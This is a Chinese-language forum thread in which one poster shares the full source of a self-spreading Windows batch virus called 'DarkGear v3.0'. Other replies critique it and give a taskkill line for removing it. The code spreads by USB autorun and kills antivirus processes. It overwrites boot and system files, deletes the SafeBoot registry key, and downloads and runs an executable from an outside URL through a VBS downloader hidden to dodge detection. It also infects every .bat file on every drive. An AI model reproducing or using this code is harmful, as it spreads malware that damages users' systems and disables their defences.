严重肯定下,你写的bat很规范,变量也用地很好。。
我也学BAT
给你看看我的把,很久前写的,不要见笑啊,U盘传播,外加一个免杀的下载者(因为这个下载者放到了带“..”的特殊文件夹里,你应该明白呵呵)
AUTOEXEC --开机过程中就运行病毒了
带感染BAT文件,而且自身感染好像没有考虑= =||
@echo off
for %%i in (D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: )do (if %cd:~0,2%==%%i goto auto)
if %cd%==C:\RECYCL goto auto
:ww
attrib %0 -a -s -r -h
copy /y %0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"
goto z
:z
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto e
tskill wscript
del "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
if not exist "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini" goto new
goto zz
:zz
Tskill Mcshield
Tskill VsTskMgr
Tskill naPrdMgr
Tskill UpdaterUI
Tskill TBMon
Tskill scan32
Tskill Ravmond
Tskill CCenter
Tskill RavTask
Tskill Rav
Tskill Ravmon
Tskill RavmonD
Tskill RavStub
Tskill KVXP
Tskill KvMonXP
Tskill KVCenter
Tskill KVSrvXP
Tskill KRegEx
Tskill UIHost
Tskill TrojDie
Tskill FrogAgent
Tskill kav
Tskill kav32
Tskill kavstart
Tskill katmain
attrib -a -s -r -h c:\boot.ini
echo c:\="microsoft dos">c:\boot.ini
attrib +a +s +r +h c:\boot.ini
attrib -a -s -r -h c:\msdos.sys
attrib -a -s -r -h c:\config.sys
echo [option] >c:\msdos.sys
echo bootkey=1 >>c:\msdos.sys
echo BootMenu=0 >>c:\msdos.sys
echo BootWarn=0 >>c:\msdos.sys
echo BootFailSafe=0 >>c:\msdos.sys
echo DisabeLog =1 >>c:\msdos.sys
for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:\config.sys
attrib +a +s +r +h c:\msdos.sys
attrib +a +s +r +h c:\config.sys
attrib -a -s -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Network Associates Error Reporting /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f >>c:\autoexec.bat
echo REG DELETE HKLM\ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStatEXE /f >>c:\autoexec.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f >>c:\autoexec.bat
echo REG add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f >>c:\autoexec.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f >>c:\autoexec.bat
attrib +a +s +r +h c:\autoexec.bat
IF NOT EXIST c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs goto f
goto x
:x
cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs http://www.llzaj.com/cmd.exe c:\Progra~1\Intern~1\PLUGINS\shell~1\DarkGear.exe
C:\Progra~1\COMMON~1\Micros~1\DarkGear.exe
copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\"
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f
goto a
:a
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" goto b
if not exist "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" goto d
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" goto c
for %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" %%i
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do md "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%c\RECYCL"
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\AutoRun.bat" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\desktop.ini" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\autorun.inf" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\" +a +s +r +h /s /d
ping 127.0.0.1 -n 10 >nul
goto a
:b
ECHO Set shell = Wscript.createobject("wscript.shell") >>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
goto a
:c
ECHO [autorun]>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO OPEN=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\open\Command=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\explore\Command=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
goto a
:d
echo [.ShellClassInfo]>>"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
goto a
:e
ECHO Set shell = Wscript.createobject("wscript.shell") >>"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)>>"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
exit
:f
md c:\Progra~1\Intern~1\PLUGINS\shell..\
echo On Error Resume Next >c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Dim eee,eeee >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eeee = LCase(WScript.Arguments(1)) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eee = LCase(WScript.Arguments(0)) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Open "GET",eee,0 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Send() >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set sGet = createObject("ADODB.Stream") >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Mode = 3 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Type = 1 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Open() >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Write(xPost.responseBody) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.SaveToFile eeee,2 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
goto x
:auto
%windir%\explorer.exe %cd:~0,2%
if not exist "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" goto ww
IF EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto z
exit
:new
md c:\Progra~1\Intern~1\PLUGINS\shell..\
copy "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" c:\Progra~1\Intern~1\PLUGINS\shell..\
at 9:58 tskill cmd
at 10:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 13:58 tskill cmd
at 14:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 19:58 tskill cmd
at 20:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 15:58 tskill cmd
at 16:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
echo This is DarkGear v3.0 , Make by The Ghost Hunter >>"C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini"
FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /a:- /s /b %%a\*.bat>>%windir%\msconfig.inf
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%i"
del "c:\windows\msconfig.inf"
exit
其实那些TSkill都没用,编这个的时候我很菜
这个根本就没有用。只要懂得批处理就知道,你前面加了echo,是显示后面的内容,不会运行,关键的几句也没什么意思。至于echo去掉以后就懒得看了,反正你现在这个是没什么关系。
不行写得不好!!@!
想一下:
如果不是在系统所在盘(%SystemDrive%)下运行有什么后果??
是不是找不到目录!!导致重启后就不会在运行了所以应将第一句改一下
%HOMEPATH%改成%SystemDrive%%homepath%这样会更好
不过在强也只是个批处理而已;一句命令kill它
taskkill /f /im cmd.exe &del "%SystemDrive%%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"
多运行两次一定搞定
还好啊..
运行后会删除自身..
系统后台会自动运行CMD..不断的运行..
然后进程里就会多很多CMD进程..
电脑一会后就会很卡..再过一会..依我看哪..就是死机了..
呵呵..还挺有意思的..
大惊小怪
小题大做